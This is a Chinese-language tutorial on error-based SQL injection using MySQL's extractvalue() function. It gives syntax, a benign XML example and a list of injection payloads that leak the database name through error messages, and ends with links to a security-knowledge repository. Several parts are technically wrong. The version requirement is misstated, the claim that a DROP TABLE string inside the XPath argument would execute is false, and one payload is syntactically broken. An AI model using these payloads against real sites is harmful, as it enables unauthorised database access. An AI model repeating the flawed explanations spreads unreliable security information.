目录

extractvalue()报错注入

一、语法介绍：

二、报错原因

网络安全小圈子

（***注：注意看版本要求）

extractvalue()报错注入

一、语法介绍：

版本：

MySQL<5.0.x

语法：

EXTRACTVALUE(xml_expression, xpath_expression)

xml_expression是一个XML类型的字段或表达式，xpath_expression是一个XPath表达式，用于指定要提取的节点。

原理：

1. 首先，函数会对xml_expression进行解析，将其转换为一个XML文档对象。
2. 然后，函数使用xpath_expression指定的路径来定位要提取的节点。
3. 最后，函数返回找到的节点的值

使用：

假设一个XML类型的字段xml_data，如下

<book>
  <title>Harry Potter</title>
  <author>J.K. Rowling</author>
  <year>2001</year>
</book>

可以使用extractvalue()函数来提取其中的节点值，如下

SELECT EXTRACTVALUE(xml_data, '/book/title') AS title,
       EXTRACTVALUE(xml_data, '/book/author') AS author,
       EXTRACTVALUE(xml_data, '/book/year') AS yearFROM books;

上述SQL语句将从xml_data字段中提取出"title"、"author"和"year"节点的值，然后将其作为结果集返回

二、报错原因

产生原因：

在extractvalue()函数中，如果xpath_expression参数可以由用户输入控制，攻击者可以构造恶意的XPath表达式，从而执行注入攻击。例如，攻击者可以构造一个恶意的输入，使得xpath_expression参数成为一个恶意的SQL语句。

示例：

SELECT * FROM books WHERE title = EXTRACTVALUE(xml_data, '/book/title')

如果xpath_expression参数可以由用户输入控制，攻击者可以构造一个恶意的输入，例如：

'; DROP TABLE books; --

这样，最终构造出的XPath表达式为：

/book/title'; DROP TABLE books; --

当该恶意输入被传递给extractvalue()函数时，它会将恶意的XPath表达式作为参数执行。由于XPath表达式中包含了一个SQL注释符（--），后续的SQL语句将被忽略，从而导致DROP TABLE books语句被执行，删除了books表。

payload：

and (extractvalue(1,concat('~'(select database()))));

and (extractvalue('anything',concat('/',(select database()))));

and (extractvalue('anything',concat('~',substring((select database()),1,5))));

and extractvalue(1,concat(0x7e,(select database()),0x7e))#

网络安全小圈子

README.md · 书半生/网络安全知识体系-实战中心 - 码云 - 开源中国 (gitee.com)https://gitee.com/shubansheng/Treasure_knowledge/blob/master/README.md

GitHub - BLACKxZONE/Treasure_knowledgehttps://github.com/BLACKxZONE/Treasure_knowledge